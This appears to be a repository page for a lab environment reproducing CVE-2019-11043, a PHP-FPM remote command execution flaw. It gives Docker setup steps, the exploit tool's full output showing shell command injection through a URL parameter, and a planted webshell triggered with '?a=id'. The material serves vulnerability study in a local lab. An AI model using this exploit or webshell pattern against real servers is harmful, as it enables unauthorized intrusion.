Skip to content
Branch: master
Find file History
Latest commit a5ea0e3 Oct 23, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
www add CVE-2019-11043 Oct 23, 2019
1.png add CVE-2019-11043 Oct 23, 2019
2.png add CVE-2019-11043 Oct 23, 2019 add English manual Oct 23, 2019 add English manual Oct 23, 2019
default.conf tab to 4 spaces Oct 23, 2019
docker-compose.yml add CVE-2019-11043 Oct 23, 2019

PHP-FPM Remote Command Execution (CVE-2019-11043)

中文版本(Chinese version)

There is a PHP remote code execution 0-Day discovered in Real World CTF 2019 Quals.

Real World CTF 2019 Quals is a CTF challenge which was organized by Chaitin Tech in China.


Environment setup

Start a vulnerable PHP server through following command:

docker-compose up -d

After the environment is started, you can see the default page at http://your-ip:8080/index.php.

Vulnerability Reproduce

Use this tool to reproduce the vulnerability,

$ go run . "http://your-ip:8080/index.php"
2019/10/23 19:41:00 Base status code is 200
2019/10/23 19:41:00 Status code 502 for qsl=1795, adding as a candidate
2019/10/23 19:41:00 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
2019/10/23 19:41:02 Attack params found: --qsl 1790 --pisos 152 --skip-detect
2019/10/23 19:41:02 Trying to set "session.auto_start=0"...
2019/10/23 19:41:02 Detect() returned attack params: --qsl 1790 --pisos 152 --skip-detect <-- REMEMBER THIS
2019/10/23 19:41:02 Performing attack using php.ini settings...
2019/10/23 19:41:02 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/23 19:41:02 Trying to cleanup /tmp/a...
2019/10/23 19:41:02 Done!

Something is show that the process is finished successfully:

A webshell is written in the background of PHP-FPM, visit http://your-ip:8080/index.php?a=id to trigger RCE:

You should notice that only part of the PHP-FPM child process is polluted, so please try a few more times to execute the command.

You can’t perform that action at this time.